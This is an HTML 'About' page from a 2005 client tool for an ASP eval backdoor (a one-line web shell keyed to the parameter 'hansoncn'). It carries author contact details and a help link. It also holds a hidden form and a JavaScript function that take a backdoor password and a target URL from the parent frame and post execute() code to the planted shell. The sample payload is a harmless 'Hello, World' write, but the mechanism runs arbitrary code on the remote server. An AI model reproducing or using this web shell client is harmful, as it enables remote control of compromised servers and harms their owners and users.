<link rel="stylesheet" type="text/css" href="lake2.css">
<div align="center">
<p>About Me</p></div>
  <p>This program is a 'eval request("hansoncn")' code client , Create by hanson1025 . </p>
  <p>Site: <a href="http://hanson1025.139.tofor.com/" target="_blank">http://hanson1025.139.tofor.com/</a><br>
  Mail: <a href="mailto:491889035@qq.com">491889035@qq.com</a><br>
  Thanks: Internet <br>
  Version:  1.0
  <br>
  Date: 2005-8-28</p>
  <p>Help: <br>
    <a href="http://wywx.oiwm.com" target="_blank">What's eval function ASP Backdoor ?</a> <br>
    <a href="http://www.google.com" target="_blank">Any Other Technology Question ?
  </a></p>
  <form name="xform" method="post" target="_blank">
<input type="hidden" name="code" value='execute("response.clear:response.write(""Hello , World !""):response.end")'>
</form>
<script>
function RUNonclick(){
document.xform.code.name = parent.pwd.value;
document.xform.action = parent.url.value;
document.xform.submit();
}
</script>